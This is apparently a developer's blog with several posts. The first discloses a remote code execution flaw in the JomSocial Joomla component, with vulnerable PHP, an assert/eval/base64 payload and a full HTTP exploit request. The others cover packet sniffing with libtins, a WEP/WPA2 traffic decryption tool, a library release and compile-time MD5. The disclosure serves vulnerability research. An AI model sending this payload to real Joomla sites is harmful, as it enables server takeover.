Average coder

Exploiting a code execution in JomSocial < 3.1.0.4

2014-01-30T21:10:00.000-03:00

Update, February 4th: JomSocial has just released a patch for this vulnerability. We contacted them again a month after our initial contact and they said that the issue had been fixed in the 3.1.0.1 release. The demo hosted on their site was no longer vulnerable (it still was in the first days of January), so we thought that the issue was indeed fixed. Unfortunately, it wasn't.

Yesterday, Gaston Traberg and I released an advisory regarding a remote code execution vulnerability in the Joomla! JomSocial component, which affected all versions >= 2.6 and < 3.1.0.1. I don't usually like to write about the security vulnerabilities that I find and report, but this one was quite interesting to exploit.

Note that we found this vulnerability by picking random, widespread, Joomla! components and auditing them. This was not a vulnerability found while trying to "hack into" a website. As soon as we found it, it was reported to the vendors.

JomSocial

JomSocial is a component which turns your Joomla! installation into a Facebook-like social network. You've got photos, videos, walls, comments, etc. A lot of its code relies on AJAX calls which build the HTML on the server side; that HTML is then rendered by the client's browser.

Even though it is not a free product, its PHP code is licensed under GPLv2.

Azrul system plugin

JomSocial relies on a plugin called "Azrul system" which has a module that automatically parses parameters and calls the appropriate function with the specified parameters. This is nice because developers don't have to explicitly parse them and dispatch to the right function; that's done transparently.

Requests that will be parsed by this system contain parameters that look like this:

  option=community&
  no_html=1&
  task=azrul_ajax&
  func=MODULE,FUNCTION&
  TOKEN=1&
  arg2=["_d_","PARAM1"]&
  arg3=["_d_","PARAM2"]&
  arg...

Where:

MODULE is the class that will handle the request. These classes have to be located in a specific directory, otherwise the request will fail.
FUNCTION is the function defined in class MODULE that will be executed.
TOKEN is an anti-CSRF token that the application assigns to each different session.
PARAM* indicates the contents of each parameter. As you can see, every parameter is a JSON-encoded string.

So for example, this call:

  option=community&
  no_html=1&
  task=azrul_ajax&
  func=Foo,Bar&
  baz=1&
  arg2=["_d_","Hello"]&
  arg3=["_d_","World!"]

Would automatically call this function (as long as it's defined in the right directory):

class Foo {
  function Bar($str1, $str2) {
     echo "$str1 $str2"; // would echo Hello World!
  }
}
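
The dispatch idea can be sketched in a few lines of C++. This is only an illustration of the concept, not how the Azrul plugin is written: the Dispatcher class, the Handler type and foo_bar are hypothetical names, and the registry plays the role of the "right directory" that handlers must live in.

```cpp
#include <cassert>
#include <functional>
#include <map>
#include <stdexcept>
#include <string>
#include <utility>
#include <vector>

// Hypothetical handler type: receives the decoded argN values in order.
using Handler = std::function<std::string(const std::vector<std::string>&)>;

// Hypothetical registry keyed by "MODULE,FUNCTION", like the func parameter.
class Dispatcher {
public:
    void add(const std::string& module, const std::string& function,
             Handler handler) {
        handlers_[module + "," + function] = std::move(handler);
    }

    // Looks up the handler named by func and calls it with the arguments.
    // Unregistered names fail, just like classes outside the right directory.
    std::string dispatch(const std::string& func,
                         const std::vector<std::string>& args) const {
        auto it = handlers_.find(func);
        if (it == handlers_.end())
            throw std::runtime_error("unknown handler: " + func);
        return it->second(args);
    }

private:
    std::map<std::string, Handler> handlers_;
};

// Counterpart of Foo::Bar from the example above.
inline std::string foo_bar(const std::vector<std::string>& args) {
    return args.at(0) + " " + args.at(1);
}
```

Registering foo_bar under "Foo", "Bar" and dispatching "Foo,Bar" with the arguments "Hello" and "World!" returns the same string the PHP example echoes.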

The vulnerability

So, while we were searching for calls to the common insecure functions, such as eval, system and passthru, we came across a call to PHP's call_user_func_array function. This call was performed in the CommunityPhotosController::ajaxUploadAvatar member function, and it looked like this:

// irrelevant code has been removed
public function ajaxUploadAvatar($type, $id, $custom = '') {
  $aCustom = json_decode($custom, true);
  $cTable = JTable::getInstance(ucfirst($type), 'CTable');
  $cTable->load($id);
  if (isset($aCustom['call'])) {
    if (isset($aCustom['call'][0]) && isset($aCustom['call'][1])) {
      $obj = $aCustom['call'][0];
      $method = $aCustom['call'][1];
      $params = count($aCustom['call']) > 2 ? array_slice($aCustom['call'], 2) : array();
      if (!empty($obj) && !empty($method)) {
        $customHTML = call_user_func_array(array($obj, $method), $params);
      }
    }
  }
}

So as you can see, the function does the following:

Loads an object representing a database table with the name $type and loads the record with id $id.
JSON-decodes its third parameter.
If there is a "call" key in the JSON-decoded string, it assumes the value for that key will be an array, and tests to see if there are at least 2 elements in it.
The first element of that array will indicate the name of an object or class and the second one, a name of a method, apparently.
The rest of the parameters will be parameters for that method.
Finally, if everything went well, it calls call_user_func_array using the provided data.

This already looks pretty insecure. We can basically indicate any class name, method and parameters, and we'll be able to execute it. All that's left now is to find a class function that allows us to do interesting stuff, like executing arbitrary PHP code.

Exploiting it

We started searching for calls to more severe functions that would give us complete control over the application, such as eval or system. Of course, we can't call them directly, since we need to call methods defined inside a class, and those are free functions.

At that point, we found a method, _runCommand, defined in the CVideos class. It's not a static one, meaning that we would need an instance of the class to call it (at least in theory), but apparently PHP allowed us to call it without one. Unfortunately, before making a call to system, this function accessed $this, and since there is no $this when no instance is associated with the call, that would trigger a fatal PHP error.

So we kept on looking and found a very interesting function, CStringHelper::escape, which looks like this:

static function escape($var, $function='htmlspecialchars')
{
   // four irrelevant lines removed here
   return call_user_func($function, $var);
}

As you can see, it calls call_user_func, using the second parameter as the name of the function to call and the first parameter as its argument. So that's it: if we managed to call this function and provide a non-class function name (such as eval) and some PHP code, we should be able to get it to execute on the server.

Not so fast

Unfortunately, it seems like, since PHP's eval function is actually a language construct rather than a real function, you can't call it this way. For example, if you call it through call_user_func, like this:

<?php
  call_user_func("eval", "echo 'Hello world';");
?>

You'll get an error like the following one:

PHP Warning: call_user_func() expects parameter 1 to be a valid callback, function 'eval' not found or invalid function name in test.php on line 2

So that doesn't work. Of course we can already call system, shell_exec, passthru, etc. but it's always better to be able to execute PHP code, since it's common for those functions to be disabled. We needed a way to execute arbitrary code that didn't require the use of eval, or at least not directly...

There's another function, assert, which shares some behavior with eval: it evaluates its parameter as PHP code and stops the execution unless the evaluated expression returns a true boolean value. Using this function we can do something like this:

<?php
  assert("eval('echo 123;');");
?>

Which looks strange but does execute the echo. Unfortunately, since eval always returns NULL unless you use a return statement in the eval'd code, this will always generate a warning: NULL is implicitly converted to false, making the assertion fail.

We could stop now, since we already reached PHP code execution, but it's better if our exploit doesn't leave traces in logs as well. Moreover, our PHP code has to be composed of only one expression, since the following code:

<?php
  assert("eval('echo 123;'); eval('echo 456;');");
?>

Will only print "123", as the assertion fails before the second eval is executed.

So what we need is a way to execute an arbitrary piece of code which consists of only one expression, doesn't generate any warnings and always returns true.

Actually, we could make it never return as well, right? We could call exit inside the expression, which will stop the execution before the assertion fails. exit takes a parameter, so we could nest another function call as its parameter. Something like this:

assert("exit(foo());");

What if the nested function was eval? We'd already be able to execute arbitrary code! So doing this should work:

assert("exit(eval('echo 123;'));");

In the end, what we came up with was the following:

<?php
  assert("@exit(@eval(@base64_decode('BASE64_ENCODED_SCRIPT')))");
?>

The extra base64 encoding was used so that we didn't even need to encode quotes, or any other character that could cause trouble. Note that the extra "@" characters force the PHP interpreter to suppress any error messages that might be generated while executing our code.
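
To see why base64 sidesteps the quoting problem, here is a minimal encoder sketch in C++ (the function name base64_encode is my own choice, and this is not the code used by the exploit). Its output only ever contains letters, digits, '+', '/' and '=', so no quote or backslash can appear, whatever the input is.

```cpp
#include <cassert>
#include <cstddef>
#include <string>

// Standard base64 encoding (RFC 4648 alphabet, '=' padding).
std::string base64_encode(const std::string& input) {
    static const char alphabet[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    std::string out;
    out.reserve((input.size() + 2) / 3 * 4);
    for (std::size_t i = 0; i < input.size(); i += 3) {
        // Pack up to three input bytes into a 24-bit group.
        const std::size_t remaining = input.size() - i;
        unsigned long group = static_cast<unsigned char>(input[i]) << 16;
        if (remaining > 1)
            group |= static_cast<unsigned char>(input[i + 1]) << 8;
        if (remaining > 2)
            group |= static_cast<unsigned char>(input[i + 2]);
        // Emit four 6-bit symbols, padding the ones that have no input.
        out += alphabet[(group >> 18) & 0x3f];
        out += alphabet[(group >> 12) & 0x3f];
        out += remaining > 1 ? alphabet[(group >> 6) & 0x3f] : '=';
        out += remaining > 2 ? alphabet[group & 0x3f] : '=';
    }
    return out;
}
```

Encoding the string echo 'Hello World'; with this function gives ZWNobyAnSGVsbG8gV29ybGQnOw==, even though the input itself contains single quotes.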

Putting it all together

Now that we know how to execute any piece of PHP code, we need to build a request that does so. In order to do that, we need:

A valid anti-CSRF token. We can find that token by making any request and analyzing the output. There will be a hidden input whose name is a string of 32 hex characters and whose value is 1. The name of the input is the token.
A valid table name, so that JTable::getInstance returns a valid object. Otherwise, the later call to JTable::load will trigger an error. In this case, we'll use the table "Event".
Since JTable::load doesn't throw an exception when there is no record with the given id, we can use any number. Besides, the retrieved record is not used before the call to call_user_func_array.
We need to base64-encode the PHP code, and insert it inside our payload.
Finally, we need to build an associative array with a key "call" that maps to a list containing the name of the class we'll use (CStringHelper), the name of the method to call (escape), the payload generated in the previous step and the string "assert".

The complete request would look like the following:

POST /index.php HTTP/1.0
Host: example.com
...

option=community&
no_html=1&
task=azrul_ajax&
func=photos,ajaxUploadAvatar&
TOKEN=1&
arg2=["_d_","Event"]&
arg3=["_d_","374"]&
arg4=["_d_","%7B%22call%22%3A%5B%22CStringHelper%22%2C%22escape%22%2C%20%22%40exit%28%40eval%28%40base64_decode%28%27ZWNobyAnSGVsbG8gV29ybGQnOw%3D%3D%27%29%29%29%3B%22%2C%22assert%22%5D%7D"]

The decoded payload (it's just an echo) looks like this:

{
  "call" : [
    "CStringHelper",
    "escape", 
    "@exit(@eval(@base64_decode('ZWNobyAnSGVsbG8gV29ybGQnOw==')));",
    "assert"
  ]
}

Our code should be executed after that, so all that's left is to parse the output. I have uploaded a working Python exploit to my GitHub account.

Creating a simple and fast packet sniffer in C++

2013-10-26T12:41:00.001-03:00

I have seen several articles on the web about writing packet sniffers using C and C++ which suggest using raw sockets and dealing with protocol headers and endianness yourself. Not only is this very tedious, but there are also libraries which already deal with that for you and make it extremely easy to work with network packets.

One of them is libtins, a library I have been actively developing for the past few years. It has support for several protocols, including Ethernet, IP, IPv6, TCP, UDP, DHCP, DNS and IEEE 802.11, and it works on GNU/Linux, Windows, OSX and FreeBSD. It even works on different architectures such as ARM and MIPS, so you could go ahead and develop some application which could be executed inside routers and other devices.

Let's see how you would sniff some TCP packets and print their source and destination port and addresses:

#include <iostream>
#include <tins/tins.h>

using namespace std;
using namespace Tins;

bool callback(const PDU &pdu) {
    const IP &ip = pdu.rfind_pdu<IP>();
    const TCP &tcp = pdu.rfind_pdu<TCP>();
    cout << ip.src_addr() << ':' << tcp.sport() << " -> " 
         << ip.dst_addr() << ':' << tcp.dport() << endl;
    return true;
}

int main() {
    // Sniff on interface eth0
    Sniffer sniffer("eth0");
    sniffer.sniff_loop(callback);
}

This is the output I get when executing it:

As you can see, it's fairly simple. Let's go through the snippet and see what it's doing:

The callback function is the one that libtins will call for us each time a new packet is sniffed. It returns a boolean, which indicates whether sniffing should go on or not, and takes a parameter of type PDU, which will hold the sniffed packet. This library represents packets as a series of Protocol Data Units (PDUs) stacked over each other. So in this case, every packet would contain EthernetII, IP and TCP PDUs.
Inside callback's body, you can see that we're calling PDU::rfind_pdu. This is a member function template which looks for the provided PDU type inside the packet, and returns a reference to it. So in the first two lines we're retrieving the IP and TCP layers, and then we're simply printing the addresses and ports.
Finally, in main an object of type Sniffer is constructed. When constructing it, we indicate that we want to sniff on interface eth0. After that, Sniffer::sniff_loop is called, which will start sniffing packets and calling our callback for each of them.
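
To make the "stack of PDUs" idea concrete, here is a toy model of it. None of these classes are libtins' real ones: ToyPDU, ToyEthernet, ToyIP, ToyTCP, ToyUDP and make_tcp_packet are hypothetical names, and the real library is implemented differently. The sketch only shows how a typed search can walk the layers and either return a reference or report that the layer is missing.

```cpp
#include <cassert>
#include <memory>
#include <stdexcept>
#include <utility>

// Toy model only: each layer owns the layer stacked below it.
struct ToyPDU {
    std::unique_ptr<ToyPDU> inner;  // next layer in the stack, if any
    virtual ~ToyPDU() = default;

    // Returns the first layer of type T, or nullptr when there is none.
    template <typename T>
    const T* find() const {
        for (const ToyPDU* layer = this; layer; layer = layer->inner.get())
            if (const T* match = dynamic_cast<const T*>(layer))
                return match;
        return nullptr;
    }

    // Same search, but returns a reference and throws when nothing matches.
    template <typename T>
    const T& rfind() const {
        if (const T* match = find<T>())
            return *match;
        throw std::runtime_error("layer not found");
    }
};

struct ToyEthernet : ToyPDU {};
struct ToyIP : ToyPDU { unsigned ttl = 64; };
struct ToyTCP : ToyPDU { unsigned short sport = 0, dport = 0; };
struct ToyUDP : ToyPDU { unsigned short sport = 0, dport = 0; };

// Builds an Ethernet / IP / TCP stack, outermost layer first.
std::unique_ptr<ToyPDU> make_tcp_packet(unsigned short sport,
                                        unsigned short dport) {
    std::unique_ptr<ToyTCP> tcp(new ToyTCP);
    tcp->sport = sport;
    tcp->dport = dport;
    std::unique_ptr<ToyIP> ip(new ToyIP);
    ip->inner = std::move(tcp);
    std::unique_ptr<ToyEthernet> eth(new ToyEthernet);
    eth->inner = std::move(ip);
    return std::unique_ptr<ToyPDU>(std::move(eth));
}
```

Calling rfind<ToyTCP>() on a packet built by make_tcp_packet gives access to the ports, while rfind<ToyUDP>() throws. In a real sniffer that sees non-TCP traffic too, that second case is the one to handle.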

Note that this example will run successfully on any of the supported operating systems (as long as you use the right interface name, of course). The endianness of each of the printed fields is handled internally by the library, so you don't even have to worry about making your code work on big-endian architectures.
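
For comparison, this is roughly the kind of byte-order handling you would write yourself when parsing headers from a raw buffer. It is a generic sketch, not code taken from libtins, and the helper names read_be16 and read_be32 are made up for the example.

```cpp
#include <cassert>
#include <cstdint>

// Reads a 16-bit big-endian (network order) value from a byte buffer.
// Assembling it byte by byte works on any host, whatever its endianness.
inline std::uint16_t read_be16(const unsigned char* bytes) {
    return static_cast<std::uint16_t>((bytes[0] << 8) | bytes[1]);
}

// Same idea for 32-bit fields, such as an IPv4 address.
inline std::uint32_t read_be32(const unsigned char* bytes) {
    return (static_cast<std::uint32_t>(bytes[0]) << 24) |
           (static_cast<std::uint32_t>(bytes[1]) << 16) |
           (static_cast<std::uint32_t>(bytes[2]) << 8) |
            static_cast<std::uint32_t>(bytes[3]);
}
```

For instance, the two bytes 0x01 0xbb found in a TCP header decode to port 443 on both little-endian and big-endian machines.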

Now, you may be wondering whether using libtins will make your code significantly slower. If that is your concern, then you should not worry about it at all! This library was designed keeping efficiency in mind at all times. As a consequence it's the fastest packet sniffing and interpretation library I've tried out (note that I tried several, such as scapy, dpkt, impacket and libcrafter). Go ahead and have a look at these benchmarks to see how fast it actually works.

libtins allows you to implement fast packet sniffers in very few lines of code. It also supports additional features like reassembling and following TCP streams, decrypting WPA2 traffic (both TKIP and AES) and defragmenting IP datagrams.

If you want to learn more about libtins, please visit this tutorial, which covers everything you should know before starting to develop your network sniffing application!

Decrypting WEP/WPA2 traffic on the fly

2013-06-04T23:42:00.003-03:00

This is the first application I've developed using libtins, a packet crafting and sniffing library I've been developing for a while. In the latest release of that library, I've added support for WPA2 decryption, so this application does very few things and does not handle encryption at all; the library does so.

The decryption of WEP and WPA2 traffic has been available for a while now. Applications such as wireshark, tshark and airdecap have supported this for quite some time. However, after adding this decryption feature to libtins, I wondered why there were no applications that let you decrypt the traffic directly from a network interface and make it available, decrypted, for any other application. This is where dot11decrypt was born.

Objective

The application sniffs a network interface looking for WEP and WPA2 encrypted traffic. It also analyzes EAPOL (802.1X) handshakes in order to track the nonces shared by peers, which will later be necessary while decrypting WPA2.

Once a packet is decrypted successfully, the 802.11 frame is replaced by an Ethernet header, and the whole packet is written to a tap interface. You can now read those decrypted packets using any other tool, such as Wireshark or ngrep, and perform any kind of analysis.

What is required for decryption

dot11decrypt does not crack any of the above mentioned encryption algorithms. So if you're looking for a wireless cracking tool, then this is not one of them.

In order to decrypt WEP encrypted traffic, you need to provide the access point's BSSID and the WEP key. The syntax required to indicate that decryption data is the following:

wep:[BSSID]:[KEY]

For example:

wep:00:01:02:03:04:05:mypassword

Indicates that the access point whose BSSID is "00:01:02:03:04:05" uses WEP encryption and the WEP key is "mypassword".

On the other hand, WPA2 traffic is a little bit more complex. In order to generate the first set of keys required to decrypt the traffic (the Pairwise Master Key or PMK), both the pre-shared key and the network SSID (your network's "name") are required.

In order to specify both of these attributes, the following syntax is used:

wpa:[SSID]:[PSK]

As an example:

wpa:MyAccessPoint:MySecretKey

Indicates that the traffic of any access point which broadcasts the SSID "MyAccessPoint" will be decrypted, assuming the PSK is "MySecretKey".
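
Parsing these two forms could look like the sketch below. This is not dot11decrypt's actual parsing code: DecryptionSpec and parse_spec are hypothetical names, and the sketch assumes that the SSID itself contains no ':' character.

```cpp
#include <cassert>
#include <stdexcept>
#include <string>

// Hypothetical result type; dot11decrypt's own code may differ.
struct DecryptionSpec {
    enum Kind { WEP, WPA } kind;
    std::string network;  // BSSID for WEP, SSID for WPA
    std::string secret;   // WEP key or WPA pre-shared key
};

DecryptionSpec parse_spec(const std::string& text) {
    const std::string::size_type bssid_length = 17;  // "xx:xx:xx:xx:xx:xx"
    if (text.compare(0, 4, "wep:") == 0) {
        // The BSSID contains colons itself, so it is taken by length.
        if (text.size() < 4 + bssid_length + 2 ||
            text[4 + bssid_length] != ':')
            throw std::invalid_argument("expected wep:[BSSID]:[KEY]");
        return {DecryptionSpec::WEP, text.substr(4, bssid_length),
                text.substr(4 + bssid_length + 1)};
    }
    if (text.compare(0, 4, "wpa:") == 0) {
        // Assumption: the SSID has no ':', so the first one ends it.
        const std::string::size_type separator = text.find(':', 4);
        if (separator == std::string::npos || separator == 4 ||
            separator + 1 == text.size())
            throw std::invalid_argument("expected wpa:[SSID]:[PSK]");
        return {DecryptionSpec::WPA, text.substr(4, separator - 4),
                text.substr(separator + 1)};
    }
    throw std::invalid_argument("unknown scheme, expected wep: or wpa:");
}
```

Taking the BSSID by length is what lets the WEP form work even though the address is written with colons, the same character used as the field separator.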

How it works

Decrypting WEP frames is fairly simple: given the WEP key, it's just a matter of running RC4 over the encrypted data.
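
As a rough illustration, here is a self-contained RC4 sketch, written for this post rather than taken from libtins. In WEP, the RC4 key for each frame is the 3-byte IV carried in that frame followed by the shared key; the helper wep_seed (a name I made up) builds it. A real decrypter also verifies the CRC-32 integrity value at the end of the decrypted payload, which is left out here.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <stdexcept>
#include <utility>
#include <vector>

typedef std::vector<std::uint8_t> bytes;

// RC4 XORs a keystream over the data, so this both encrypts and decrypts.
bytes rc4(const bytes& key, const bytes& data) {
    if (key.empty())
        throw std::invalid_argument("RC4 key must not be empty");
    // Key-scheduling algorithm: permute the state according to the key.
    std::uint8_t state[256];
    for (int i = 0; i < 256; ++i)
        state[i] = static_cast<std::uint8_t>(i);
    std::uint8_t j = 0;
    for (int i = 0; i < 256; ++i) {
        j = static_cast<std::uint8_t>(j + state[i] + key[i % key.size()]);
        std::swap(state[i], state[j]);
    }
    // Pseudo-random generation: one keystream byte per data byte.
    bytes out(data.size());
    std::uint8_t a = 0, b = 0;
    for (std::size_t n = 0; n < data.size(); ++n) {
        a = static_cast<std::uint8_t>(a + 1);
        b = static_cast<std::uint8_t>(b + state[a]);
        std::swap(state[a], state[b]);
        const std::uint8_t index =
            static_cast<std::uint8_t>(state[a] + state[b]);
        out[n] = static_cast<std::uint8_t>(data[n] ^ state[index]);
    }
    return out;
}

// Per-frame WEP seed: the frame's IV followed by the shared WEP key.
bytes wep_seed(const bytes& iv, const bytes& wep_key) {
    bytes seed(iv);
    seed.insert(seed.end(), wep_key.begin(), wep_key.end());
    return seed;
}
```

Decrypting a frame body then amounts to rc4(wep_seed(iv, key), encrypted_payload).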

Decrypting WPA2, however, is a little bit trickier. In order to decrypt a WPA2 encrypted frame, the following is required:

The PMK(mentioned a few lines above).
The association SSID -> BSSID.
A valid 4-way handshake between the access point and the client which sends or is about to receive that frame.

The application initially computes the PMK. Since you only provide the network SSID, the application will look for beacon frames to find out which BSSIDs are broadcasting the given SSID.

After that, when a client performs a handshake against those BSSIDs, a Pairwise Transient Key (PTK) is computed and stored. At that point, any packet sent from or to the associated client will be decrypted using that PTK. If any client is deauthenticated and then authenticated again, that new handshake will be taken into account and used to decrypt its packets.

Luckily for us, all of the above is already implemented and performed automatically by libtins: inspecting beacon frames looking for the SSID, capturing 4-way handshakes and decrypting the traffic. If you want to see that code, have a look at the WPA2Decrypter class.

Note that WPA2 decryption works for both AES (CCMP) and TKIP encrypted frames, so this works for WPA as well (since it uses TKIP).
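
For reference, these are the two derivations as IEEE 802.11i defines them, written from the standard rather than from the libtins source. AA and SPA are the MAC addresses of the access point and the client, and ANonce and SNonce are the nonces exchanged in the 4-way handshake, which is why that handshake has to be captured.

```latex
\begin{aligned}
\mathrm{PMK} &= \mathrm{PBKDF2}\big(\text{HMAC-SHA1},\ \mathrm{PSK},\ \mathrm{SSID},\ 4096,\ 256\ \text{bits}\big) \\
\mathrm{PTK} &= \mathrm{PRF}\big(\mathrm{PMK},\ \text{``Pairwise key expansion''},\
  \min(AA, SPA) \,\|\, \max(AA, SPA) \,\|\,
  \min(ANonce, SNonce) \,\|\, \max(ANonce, SNonce)\big)
\end{aligned}
```

The PMK depends only on the PSK and the SSID, so it can be computed once up front, while the PTK changes with every handshake.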

Compiling the application

In order to compile dot11decrypt, the latest version of libtins is required (version 1.1 at the moment of writing). You can download it from the project's GitHub entry. The library must be compiled with support for WPA2 decryption (this is enabled by default).

Since the application uses some C++11 features, a fairly recent C++ compiler is needed as well. g++ 4.6 is enough. g++ 4.5 might do.

dot11decrypt's source code can be downloaded from GitHub. After you've got these, just go ahead and do the usual:

./configure
make

Using it

The application takes the interface on which to listen for packets as its first argument. This must be a wireless interface in monitor mode. The rest of the arguments specify the decryption data, using the syntax mentioned near the beginning of this post:

./dot11decrypt wlan0 wpa:MyAccessPoint:some_password
./dot11decrypt mon0 wep:00:01:02:03:04:05:blahbleehh

After running it, you'll get an output similar to the following:

Using device: tap0
Device is up.

The tap0 interface will now be used to output the decrypted traffic. tcpdump or any other network sniffing tool can be used to process the data. Note that the 802.11 (and possibly the RadioTap encapsulation used) and LLC+SNAP frames will be removed and replaced by an Ethernet header.

Note that you require either root privileges or the CAP_NET_ADMIN capability on the executable to run this application successfully.

Example

In this example, I'm going to sniff and decrypt the traffic sent from my phone.

The mon0 interface, the one I'll be using, is in monitor mode. This is the output of running tcpdump on that interface, filtering only IEEE 802.11 data frames for which the second address in that frame is the access point's BSSID:

As you can see, there are several Dot11 QoS Data frames, all of them encrypted.

Now, I'm going to execute dot11decrypt providing the SSID and the WPA2 PSK:

A new tap interface has been created, named tap0. Every decrypted packet will be written to it.

At this point, I connected my phone to the access point. The application captures the 802.1X handshake and starts decrypting the traffic. In the image below, you can see how the traffic sniffed from the tap0 interface is no longer encrypted:

I hope you find this application useful!

libtins v0.2 released

2012-10-21T10:40:00.000-03:00

After coding and testing libtins a lot in the past months, we're proud to announce the release of the 0.2 version. libtins is a network packet crafting and sniffing library. It allows you to forge packets with very little effort, forgetting about each protocol data unit's endianness, internal representation, etc.

In this release, there have been several changes:

IP and hardware addresses can now be handled easily. Instead of using pointers or integral values to represent them, there's now a class which abstracts each of them, making it easy to create them from their string representations, and compare them. You can now use hardware addresses as keys inside std::maps, or insert them in std::sets.
Added support for big endian architectures. We've worked hard to make sure every getter, setter and function available handles endianness correctly. Now you can create tools and run them on both little and big endian architectures, without worrying about it.
Generalized and simplified some interfaces. The Sniffer class required you to inherit a class from an AbstractSnifferHandler just to perform a call to Sniffer::sniff_loop. Now this function takes a template functor argument and calls it every time a new packet is sniffed off the wire, making your life a lot easier.
Network interfaces used to be handled internally by each PDU. Classes would usually take a std::string, look up the corresponding interface index and store it, and also provide overloads that took the integral index directly. Now there's a NetworkInterface class which does this job internally. So PDUs now take objects of this type rather than providing several overloads (which, in cases like the Dot11 class hierarchy, reduces the boilerplate code significantly).
You can now follow TCP streams on the fly. There's a TCPStreamFollower class that sniffs packets (either from a network interface or a pcap file), and reassembles TCP streams, executing a callback whenever there's data available.
We're planning to allow decrypting any 802.11 encrypted data frame on the fly. In this release, by providing tuples (bssid, password), you can decrypt WEP-encrypted frames while sniffing, in a completely transparent way. I'll soon add an example in the libtins website on how to do that.
We've added support for some new PDUs: Null/Loopback, IEEE 802.3, LLC and DNS.
You can now read and write pcap files, using a very simple interface.
Finally, there's been a huge refactoring of the entire code. Code has been RAII'd a lot. There are fewer pointers moving around, and more automatic storage objects and references.
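
To illustrate the first item of the list, here is what an address abstraction of that kind can look like. MacAddress is a hypothetical stand-in written for this example; it is not libtins' own address class, whose interface is richer. All it needs in order to work as a std::map key or a std::set element is an ordering.

```cpp
#include <array>
#include <cassert>
#include <cstdio>
#include <map>
#include <stdexcept>
#include <string>

// Hypothetical stand-in for an address class; not libtins' actual one.
class MacAddress {
public:
    // Parses the usual "xx:xx:xx:xx:xx:xx" notation.
    explicit MacAddress(const std::string& text) {
        unsigned int parts[6];
        char trailing;
        // A seventh conversion would mean there is garbage after the address.
        const int converted = std::sscanf(
            text.c_str(), "%2x:%2x:%2x:%2x:%2x:%2x%c", &parts[0], &parts[1],
            &parts[2], &parts[3], &parts[4], &parts[5], &trailing);
        if (converted != 6)
            throw std::invalid_argument("malformed hardware address");
        for (int i = 0; i < 6; ++i)
            bytes_[i] = static_cast<unsigned char>(parts[i]);
    }

    bool operator==(const MacAddress& other) const {
        return bytes_ == other.bytes_;
    }

    // Lexicographic ordering, which is what std::map and std::set need.
    bool operator<(const MacAddress& other) const {
        return bytes_ < other.bytes_;
    }

private:
    std::array<unsigned char, 6> bytes_;
};
```

With this in place, something like std::map<MacAddress, std::string> works out of the box, and two addresses written with different letter case compare equal because they are compared as bytes.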

In case you want to try the library out, please visit its website and download the latest version.

Compile time MD5 using constexpr

2012-08-30T22:11:00.000-03:00

Today, someone on Stack Overflow asked how to perform compile-time hashing in C++. After providing a small, naive example in my answer, I thought it would actually be interesting to implement some well-known hashing algorithm using C++11 features, such as constexpr. So I gave MD5 a try, and after some hours of trying stuff, I was able to create compile-time MD5 hashes.

The MD5 hashing algorithm

Implementing the algorithm itself was not as hard as I thought it would be. The algorithm is roughly like this:

It starts with four 32-bit integers which contain predefined values.
The algorithm contains 4 "rounds". On each of them, a different function is applied to those integers and the input string.
The result of those rounds serves as input to the next ones.
Add the four resulting 32-bit integers to the original, predefined integer values.
Interpret the resulting integers as a chunk of 16 bytes.

That's it. Note that I've somewhat stripped down the algorithm so that it only handles short strings. A real implementation would iterate several times, doing the same thing on each block of the buffer. But since nobody is going to hash large strings at compile time, I've simplified the algorithm a little bit.

The implementation

So basically the implementation was not that hard: some template metaprogramming and several constexpr functions. Since there was a pattern in the way the arguments were provided as input to the functions in each round, I used a specialization which avoided lots of repeated code.

The worst part was generating the input for that algorithm. The input is not just the string which is to be hashed. The steps to generate that input are roughly as follows:

Create a buffer of 64 bytes, filled with zeros.
Copy the input string into the start of the buffer.
Store a 0x80 byte at buffer[size_of_input_string].
At buffer[56], the value size_of_input_string * 8 (the length in bits) must be stored.

That's all. The algorithm will only work with strings of no more than 31 bytes, since the length in bits (at most 31 * 8 = 248) has to fit in the single byte stored at buffer[56]. It could be generalized by modifying the appropriate bytes on buffer[57:60], but that was not my objective.
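
The buffer layout described above can be sketched as a constexpr function. Note the assumptions: this version relies on C++14's relaxed constexpr rules (loops and local variables), so it is simpler than what the C++11 implementation from this post has to do, and the names md5_block and make_md5_block are made up for the example.

```cpp
#include <cassert>
#include <cstddef>

// Hypothetical holder for the padded 64-byte block.
struct md5_block {
    unsigned char bytes[64];
};

// Builds the single 64-byte input block from a string literal.
// Needs C++14: constexpr functions could not contain loops in C++11.
template <std::size_t n>
constexpr md5_block make_md5_block(const char (&text)[n]) {
    static_assert(n - 1 <= 31, "only strings of up to 31 bytes are supported");
    md5_block block{};                       // 64 zero bytes
    for (std::size_t i = 0; i + 1 < n; ++i)  // copy without the trailing '\0'
        block.bytes[i] = static_cast<unsigned char>(text[i]);
    block.bytes[n - 1] = 0x80;               // marker right after the text
    block.bytes[56] = static_cast<unsigned char>((n - 1) * 8);  // bit length
    return block;
}

// Everything below is checked by the compiler, not at run time.
constexpr md5_block example_block = make_md5_block("constexpr rulz");
static_assert(example_block.bytes[0] == 'c', "text is copied to the start");
static_assert(example_block.bytes[14] == 0x80, "marker follows the text");
static_assert(example_block.bytes[56] == 14 * 8, "length is stored in bits");
static_assert(example_block.bytes[57] == 0, "the rest stays zeroed");
```

The static_assert lines show the point of the exercise: the whole block exists as a compile-time constant, ready to be fed to the rounds.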

In order to achieve this buffer initialization, I had to somehow decompose the input string into characters, and then join them and those special bytes into an array which could be used at compile time. To do that, I implemented a constexpr_array, which is just a wrapper around a built-in array, but provides a constexpr data() member, something that std::array does not have (I'm not really sure why):

template<typename T, size_t n>
struct constexpr_array {
    const T array[n];
    
    constexpr const T *data() const {
        return array;
    }
};

The decomposition ended up pretty simple, but I had to struggle to figure out how the hell to implement it.

Finally, the interface for the compile time MD5 would be the following:

template<size_t n> constexpr md5_type md5(const char (&data)[n])

The typedef for the function's result is the following:

typedef std::array<char, 16> md5_type;

Note that everything in the implementation resides in namespace ConstexprHashes.

As an example, this code generates a hash and prints it:

#include <iostream>
#include "md5.h"

int main() {
    constexpr auto value = ConstexprHashes::md5("constexpr rulz");
   
    std::cout << std::hex;
    for(auto v : value) {
        if(((size_t)v & 0xff) < 0x10)
            std::cout << '0';
        std::cout << ((size_t)v & 0xff);
    }
    std::cout << std::endl;
}

This prints out: "b8b4e2be16d2b11a5902b80f9c0fe6d6", which is the right hash for "constexpr rulz".

Unluckily, the only compiler that is able to compile this is clang 3.1 (I haven't tested it on newer versions). GCC doesn't like the code, and believes some constexpr stuff is actually non-constexpr. I'm not 100% sure that clang is the one that's right, but it looks like it is.

